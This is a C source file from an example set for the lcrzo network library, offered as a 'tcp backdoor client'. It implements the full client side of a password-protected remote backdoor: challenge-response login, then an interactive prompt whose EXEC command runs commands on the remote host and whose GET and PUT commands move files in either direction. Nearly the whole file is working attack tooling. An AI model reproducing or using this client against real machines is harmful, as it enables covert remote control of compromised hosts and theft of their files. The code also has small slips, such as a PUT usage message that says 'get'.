
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"
#include "shared/shared_misc.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000217=
{ /*reference*/     "lcrzoex", 217,
  /*version*/       1, 0,
  /*title*/         "tcp backboor client [interactive]",
  /*french title*/  "client tcp backdoor [interactif]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port",
  /*french usage*/  "nom_serveur port_serveur ",
  /*usage example*/ "1.2.3.4 1234",
  /*fr. usage ex.*/ "1.2.3.4 1234",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000217_main(int argc, char *argv[]);
int lcrzoex_000217_clientstdin(lcrzo_sock *psock);
int lcrzoex_000217_auth(lcrzo_sock *psock, lcrzo_conststring password);
int lcrzoex_000217_quit(lcrzo_sock *psock, 
			lcrzo_conststring parameters);
int lcrzoex_000217_help(lcrzo_sock *psock, 
			lcrzo_conststring parameters);
int lcrzoex_000217_exec(lcrzo_sock *psock, 
			lcrzo_conststring parameters);
int lcrzoex_000217_get(lcrzo_sock *psock, 
		       lcrzo_conststring parameters);
int lcrzoex_000217_put(lcrzo_sock *psock, 
		       lcrzo_conststring parameters);

/*-------------------------------------------------------------*/
/* error codes */
#define LCRZOEX_000216_ERR_OK_            100
#define LCRZOEX_000216_ERR_OKBYE_         101

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000217_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_sock sock;

  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000217, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize addresses */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));

  /* initialize the client */
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, (lcrzo_uint16)atoi(argv[2]), &sock));

  /* run the client */
  lcrzo_epr(lcrzoex_000217_clientstdin(&sock));

  /* close the client */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_clientstdin(lcrzo_sock *psock)
{ lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_string passwd, command, parameters;
  lcrzo_regexp re;
  int ret, language;
  
  /* authenticate the client */
  lcrzo_epr(lcrzo_string_initm_text_passwd("Passwd", "", &passwd));
  lcrzo_epr(lcrzoex_000217_auth(psock, passwd));
  lcrzo_epr(lcrzo_string_free(passwd));

  /* treat user's requests */
  lcrzo_epr(lcrzo_global_get_language(&language));
  while(1)
  { /* read user data */
    printf("server> ");
    lcrzo_epr(lcrzo_stream_flush(stdout));
    lcrzo_epr(lcrzo_fd_readm_line(0, LCRZO_TRUE, &data, &datasize));
    /* print the read data */
    /*lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_DUMP));*/
    /* separate command and parameters */
    ret=lcrzo_data_search_regexp(data, datasize, LCRZO_FALSE, +1, -1,
				 "^[ \t]*([A-Za-z]+)[ \t]*(.*)[ \t]*$", re);
    if ( ret!=LCRZO_ERR_OK )
    { /* unrecognized command */
      lcrzo_data_free(data);
      if ( language==LCRZO_GLOBAL_FRLANG )
      { printf("La ligne n'a pas la forme \"commande [parametres]\". ");
        printf("Entrez \"HELP\" pour l'aide.\n");
      }
      else
      { printf("The line hasn't the format \"command [parameters]\". ");
	printf("Enter \"HELP\" for help.\n");
      }
      continue;
    }
    /* set command and parameters */
    data[datasize]='\0';
    lcrzo_epr(lcrzo_string_initm_range(data, re[1].startindex_positive,
				       re[1].endindex_positive, &command));
    if ( re[1].startindex_positive==0 && re[1].endindex_positive==0 )
    { lcrzo_epr(lcrzo_string_initm_text("", &parameters));
    }
    else
    { lcrzo_epr(lcrzo_string_initm_range(data, re[2].startindex_positive,
					 re[2].endindex_positive,&parameters));
    }
    lcrzo_data_free(data);
    /* call functions corresponding to commands */
    /* if we read 'QUIT', we quit */
    if ( ! strcasecmp(command, "quit") )
    { lcrzo_epr(lcrzoex_000217_quit(psock, parameters));
      break;
    }
    /* if we read 'HELP', we display help */
    else if ( ! strcasecmp(command, "help") )
    { lcrzo_epr(lcrzoex_000217_help(psock, parameters));
    }
    /* if we read 'EXEC', we execute a command */
    else if ( ! strcasecmp(command, "exec") )
    { lcrzo_epr(lcrzoex_000217_exec(psock, parameters));
    }
    /* if we read 'GET', we get a file */
    else if ( ! strcasecmp(command, "get") )
    { lcrzo_epr(lcrzoex_000217_get(psock, parameters));
    }
    /* if we read 'PUT', we put a file */
    else if ( ! strcasecmp(command, "put") )
    { lcrzo_epr(lcrzoex_000217_put(psock, parameters));
    }
    /* unknown command */
    else
    { if ( language==LCRZO_GLOBAL_FRLANG )
      { printf("Cette commande n'est pas supportee. ");
        printf("Entrez \"HELP\" pour l'aide.\n");
      }
      else
      { printf("This command isn't supported. ");
	printf("Enter \"HELP\" for help.\n");
      }
    }
 
    lcrzo_string_free(command);
    lcrzo_string_free(parameters);    
  }

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_auth(lcrzo_sock *psock, lcrzo_conststring password)
{ lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_regexp re;
  lcrzo_string serverrand, clientrand, hash; 
  int ret;

  /* get the server rand */
  lcrzo_epr(lcrzo_sock_readm_line(psock, LCRZO_TRUE, &data, &datasize));
  ret=lcrzo_data_search_regexp(data, datasize, LCRZO_FALSE, +1, -1,
			       "^100 (................) .*$", re);
  if ( ret!=LCRZO_ERR_OK )
  { /* unrecognized banner */
    lcrzo_data_free(data);
    return(LCRZOEX_ERR_MISC_BADRESPONSE);
  }
  data[datasize]='\0';
  lcrzo_epr(lcrzo_string_initm_range(data, re[1].startindex_positive,
				     re[1].endindex_positive, &serverrand));
  lcrzo_data_free(data);

  /* generate the salt */
  lcrzo_epr(lcrzo_string_initm_rand(33, 126, 16, &clientrand));

  /* compute the hash */
  lcrzo_epr(shared_misc_randpasshash(serverrand, clientrand, password, &hash));
  lcrzo_string_free(serverrand);

  /* send the hash */
  lcrzo_epr(lcrzo_data_initm_text("AUTH ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(clientrand, datasize, &data, &datasize));
  lcrzo_string_free(clientrand);
  lcrzo_epr(lcrzo_data_appendm_text(" ", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(hash, datasize, &data, &datasize));
  lcrzo_string_free(hash);
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_data_free(data);

  /* verify if OK */
  lcrzo_epr(shared_misc_verifyresponse1(psock, LCRZOEX_000216_ERR_OK_));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_quit(lcrzo_sock *psock,
			lcrzo_conststring parameters)
{ lcrzo_data data;
  lcrzo_int32 datasize;

  /* write end */
  lcrzo_epr(lcrzo_data_initm_text("QUIT\n", &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free(data));

  /* read answer */
  lcrzo_epr(shared_misc_verifyresponse1(psock, LCRZOEX_000216_ERR_OKBYE_));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_help(lcrzo_sock *psock,
			lcrzo_conststring parameters)
{ int language;

  lcrzo_epr(lcrzo_global_get_language(&language));
      
  if ( language==LCRZO_GLOBAL_FRLANG )
  { puts("HELP                            : affiche l'aide");
    puts("GET fichierdistant fichierlocal : telecharge fichierdistant en fihcierlocal");
    puts("PUT fichierlocal fichierdistant : uploade fichierlocal en fichierdistant");
    puts("EXEC commande                   : execute la commande");
    puts("QUIT                            : quitte");
  }
  else
  { puts("HELP                      : display this help");
    puts("GET distantfile localfile : download distantfile in localfile");
    puts("PUT localfile distantfile : upload localfile in distantfile");
    puts("EXEC command              : execute the command");
    puts("QUIT                      : leave");
  }
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_exec(lcrzo_sock *psock,
			lcrzo_conststring parameters)
{ lcrzo_data data;
  lcrzo_int32 datasize, sizetoread;
  lcrzo_string errorcode, commandoutputsize;
  lcrzo_regexp re;
  int ret, language;

  lcrzo_epr(lcrzo_global_get_language(&language));

  /* write command */
  lcrzo_epr(lcrzo_data_initm_text("EXEC ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(parameters, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free(data));

  /* read answer (ignore error) */
  ret=shared_misc_verifyresponse(psock, LCRZOEX_000216_ERR_OK_,
				 LCRZOEX_000216_ERR_OK_,LCRZOEX_000216_ERR_OK_,
				 LCRZOEX_000216_ERR_OK_, LCRZO_TRUE,
				 NULL, &data, &datasize);
  if ( ret==LCRZOEX_ERR_MISC_BADRESPONSE )
  { lcrzo_epr(lcrzo_data_free(data));
    return(LCRZO_ERR_OK);
  }
  else if ( ret!=LCRZO_ERR_OK )
  { return(ret); 
  }

  /* get size and error code */
  ret=lcrzo_data_search_regexp(data, datasize, LCRZO_FALSE, +1, -1,
			       "^([0-9]+) ([0-9]+)", re);
  if ( ret!=LCRZO_ERR_OK )
  { /* unrecognized banner */
    lcrzo_data_free(data);
    return(LCRZOEX_ERR_MISC_BADRESPONSE);
  }
  data[datasize]='\0';
  lcrzo_epr(lcrzo_string_initm_range(data, re[1].startindex_positive,
				     re[1].endindex_positive,
				     &commandoutputsize));
  lcrzo_epr(lcrzo_string_initm_range(data, re[2].startindex_positive,
				     re[2].endindex_positive, &errorcode));
  lcrzo_data_free(data);

  /* display error code */
  if ( language==LCRZO_GLOBAL_FRLANG )
    printf("Code d'erreur %s\n", errorcode);
  else
    printf("Error code %s\n", errorcode);
  lcrzo_string_free(errorcode);

  /* display command result */
  lcrzo_epr(lcrzo_int32_init_text(commandoutputsize, &sizetoread));  
  lcrzo_string_free(commandoutputsize);
  lcrzo_sock_readm_fixed(psock, LCRZO_TRUE, sizetoread, &data);
  data[sizetoread]='\0';
  printf("%s\n", data);
  lcrzo_data_free(data);

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_get(lcrzo_sock *psock,
		       lcrzo_conststring parameters)
{ lcrzo_data data;
  lcrzo_int32 datasize, filesize, bytetoread;
  lcrzo_string distantfile, localfile;
  lcrzo_bool errorinread;
  lcrzo_regexp re;
  int ret, fd, language;

  /* get files */
  ret=lcrzo_string_search_regexp(parameters, LCRZO_FALSE, +1, -1,
				 "^[ \t]*([^ \t]+)[ \t]*([^ \t]+)[ \t]*$", re);
  if ( ret!=LCRZO_ERR_OK )
  { /* unrecognized command */
    if ( language==LCRZO_GLOBAL_FRLANG )
      puts("Usage : get fichierdistant fichierlocal");
    else
      puts("Usage : get distantfile localfile");
    return(LCRZO_ERR_OK);
  }
  lcrzo_epr(lcrzo_string_initm_range(parameters, re[1].startindex_positive,
				     re[1].endindex_positive, &distantfile));
  lcrzo_epr(lcrzo_string_initm_range(parameters, re[2].startindex_positive,
				     re[2].endindex_positive, &localfile));

  /* open the local file */
  lcrzo_epr(lcrzo_global_get_language(&language));
  ret=lcrzo_fd_open_write(localfile, LCRZO_FALSE, LCRZO_FALSE, &fd);
  if (ret!=LCRZO_ERR_OK)
  { if ( language==LCRZO_GLOBAL_FRLANG )
      printf("Impossible d'ouvrir %s\n", localfile);
    else
      printf("Can't open %s\n", localfile);
    lcrzo_string_free(distantfile);
    lcrzo_string_free(localfile);
    return(LCRZO_ERR_OK);
  }
  lcrzo_string_free(localfile);

  /* send the command */
  lcrzo_epr(lcrzo_data_initm_text("GET ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(distantfile, datasize, &data, &datasize));
  lcrzo_string_free(distantfile);
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free(data));

  /* get the size to read */
  ret=shared_misc_verifyresponse(psock, LCRZOEX_000216_ERR_OK_,
				 LCRZOEX_000216_ERR_OK_,LCRZOEX_000216_ERR_OK_,
				 LCRZOEX_000216_ERR_OK_, LCRZO_TRUE,
				 NULL, &data, &datasize);
  if ( ret==LCRZOEX_ERR_MISC_BADRESPONSE )
  { lcrzo_epr(lcrzo_data_free(data));
    return(LCRZO_ERR_OK);
  }
  else if ( ret!=LCRZO_ERR_OK )
  { return(ret); 
  }
  data[datasize]='\0';
  lcrzo_er(lcrzo_int32_init_text(data, &filesize));
  lcrzo_epr(lcrzo_data_free(data));

  /* read filesize bytes, and put them in the file (if no error) */
  errorinread=LCRZO_FALSE;
  bytetoread=filesize;
  while (bytetoread)
  { lcrzo_epr(lcrzo_sock_readm(psock, LCRZO_TRUE, &data, &datasize));
    lcrzo_epr(lcrzo_fd_write(fd, data, datasize));
    lcrzo_epr(lcrzo_data_free(data));
    if (datasize>bytetoread)
    { /* the server sent too much */
      errorinread=LCRZO_TRUE;
      break;
    }
    bytetoread-=datasize;
  }
  lcrzo_epr(lcrzo_fd_close(fd));

  /* write error message */
  if ( errorinread )
  { if ( language==LCRZO_GLOBAL_FRLANG )
      puts("Lu trop de caracteres");
    else
      puts("Read too much bytes");
    return(LCRZO_ERR_OK);
  }

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000217_put(lcrzo_sock *psock,
		       lcrzo_conststring parameters)
{ lcrzo_data data;
  lcrzo_int32 datasize, filesize;
  lcrzo_string distantfile, localfile;
  lcrzo_regexp re;
  int ret, fd, language;

  /* get files */
  ret=lcrzo_string_search_regexp(parameters, LCRZO_FALSE, +1, -1,
				 "^[ \t]*([^ \t]+)[ \t]*([^ \t]+)[ \t]*$", re);
  if ( ret!=LCRZO_ERR_OK )
  { /* unrecognized command */
    if ( language==LCRZO_GLOBAL_FRLANG )
      puts("Usage : get fichierlocal fichierdistant");
    else
      puts("Usage : get localfile distantfile");
    return(LCRZO_ERR_OK);
  }
  lcrzo_epr(lcrzo_string_initm_range(parameters, re[1].startindex_positive,
				     re[1].endindex_positive, &localfile));
  lcrzo_epr(lcrzo_string_initm_range(parameters, re[2].startindex_positive,
				     re[2].endindex_positive, &distantfile));

  /* open the local file */
  lcrzo_epr(lcrzo_global_get_language(&language));
  ret=lcrzo_fd_open_read(localfile, &fd);
  if (ret!=LCRZO_ERR_OK)
  { if ( language==LCRZO_GLOBAL_FRLANG )
      printf("Impossible d'ouvrir %s\n", localfile);
    else
      printf("Can't open %s\n", localfile);
    lcrzo_string_free(distantfile);
    lcrzo_string_free(localfile);
    return(LCRZO_ERR_OK);
  }
  lcrzo_string_free(localfile);

  /* send the command */
  lcrzo_epr(lcrzo_data_initm_text("PUT ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text(distantfile, datasize, &data, &datasize));
  lcrzo_string_free(distantfile);
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free(data));

  /* write the size of the file */
  lcrzo_epr(lcrzo_fd_size(fd, &filesize));
  lcrzo_epr(lcrzo_data_initm_int(filesize, "%d", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free(data));

  /* write file data */ 
  while ( lcrzo_fd_readm(fd, LCRZO_TRUE, &data, &datasize) == LCRZO_ERR_OK ) 
  { lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_data_free(data);
  }
  lcrzo_epr(lcrzo_fd_close(fd));

  /* read answer */
  lcrzo_epr(shared_misc_verifyresponse1(psock, LCRZOEX_000216_ERR_OK_));

  return(LCRZO_ERR_OK);
}
